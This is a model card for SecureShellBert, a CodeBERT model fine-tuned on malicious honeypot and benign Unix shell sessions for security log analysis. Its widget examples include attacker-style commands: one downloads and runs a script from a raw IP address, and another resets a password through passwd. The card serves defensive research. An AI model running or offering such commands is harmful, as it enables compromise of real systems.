---
widget:
  - text: cat /proc/cpuinfo | cat <mask> | wc -l ;
  - text: echo -e pcnv81k7W9cAOnonv81k7W9cAOno | passwd | <mask> ;
  - text: >-
      cat /proc/cpuinfo | grep name | head -n 1 | awk {<mask>
      $4,$5,$6,$7,$8,$9;} ;
  - text: wget http://81.23.76.166/bin.sh ; chmod 777 bin.sh ; sh <mask>.sh ;
pipeline_tag: fill-mask
metrics:
  - perplexity
---

# SecureShellBert

SecureShellBert is a CodeBERT model fine-tuned for masked language modelling (MLM) on Unix shell commands.
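A minimal fill-mask query could look like the sketch below. The Hub model id is a placeholder (this card does not state the repository name), and `transformers` is imported lazily so the sketch can be read without it installed:

```python
def top_completions(masked_cmd: str, k: int = 3):
    """Return the k most likely fillers for the <mask> slot in a shell command."""
    # Imported lazily; requires the `transformers` package at call time.
    from transformers import pipeline

    # NOTE: placeholder id -- replace with the actual SecureShellBert Hub repository.
    fill = pipeline("fill-mask", model="SecureShellBert")
    return [(pred["token_str"], pred["score"]) for pred in fill(masked_cmd, top_k=k)]

# One of the widget examples from the metadata above:
masked = "wget http://81.23.76.166/bin.sh ; chmod 777 bin.sh ; sh <mask>.sh ;"
# top_completions(masked)  # downloads the model weights on first call
```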

The model was domain-adapted following the Hugging Face masked language modelling guide, using a corpus of more than 20k Unix sessions, comprising both malicious sessions (see more at HaaS) and benign ones (see more at NLP2Bash).

The model was trained with:

- 10 epochs
- MLM probability of 0.15
- batch size of 16
- learning rate of 1e-5
- chunk size of 256
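The chunk size above refers to the preprocessing step of the Hugging Face MLM guide, in which tokenized sessions are concatenated and split into fixed-length chunks. A minimal sketch of that step, using illustrative token ids rather than a real tokenizer:

```python
CHUNK_SIZE = 256  # chunk size used for training, per the list above

def group_into_chunks(tokenized_sessions, chunk_size=CHUNK_SIZE):
    """Concatenate tokenized sessions and split into fixed-size chunks,
    dropping the ragged remainder (as in the Hugging Face MLM guide)."""
    flat = [tok for session in tokenized_sessions for tok in session]
    usable = (len(flat) // chunk_size) * chunk_size
    return [flat[i:i + chunk_size] for i in range(0, usable, chunk_size)]

# Two fake tokenized sessions of 300 "token ids" each (600 total -> 2 chunks of 256).
sessions = [list(range(300)), list(range(300))]
chunks = group_into_chunks(sessions)
print(len(chunks), len(chunks[0]))  # 2 256
```

During training, a data collator then masks 15% of the tokens in each chunk (the MLM probability listed above).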

This model was used to fine-tune LogPrecis. See the GitHub repository for code and data, and please cite our article.